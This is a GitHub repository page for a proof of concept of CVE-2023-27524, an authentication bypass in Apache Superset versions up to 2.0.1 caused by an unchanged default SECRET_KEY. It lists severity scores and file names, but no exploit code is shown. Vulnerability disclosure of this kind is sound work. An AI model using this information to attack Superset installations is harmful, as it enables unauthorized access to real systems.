Skip to content
/ CVE-2023-27524 Public

Apache Superset Auth Bypass Vulnerability CVE-2023-27524.

License

MIT license
3 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

antx-code/CVE-2023-27524

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
CVE-2023-27524.py
CVE-2023-27524.py
 
 
LICENSE
LICENSE
 
 
README.org
README.org
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2023-27524

Description

  • POC for CVE-2023-27524: Apache Superset Auth Bypass Vulnerability.
  • create by antx at 2023-04-27.

Detail

  • Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.

CVE Severity

  • attackComplexity: HIGH
  • attackVector: NETWORK
  • availabilityImpact: LOW
  • confidentialityImpact: HIGH
  • integrityImpact: HIGH
  • privilegesRequired: NONE
  • scope: CHANGED
  • userInteraction: NONE
  • version: 3.1
  • baseScore: 8.9
  • baseSeverity: HIGH

Affect

  • Apache Superset
    • <= 2.0.1

POC

Patch

Reference

About

Apache Superset Auth Bypass Vulnerability CVE-2023-27524.

Resources

Readme

License

MIT license
Activity

Stars

3 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages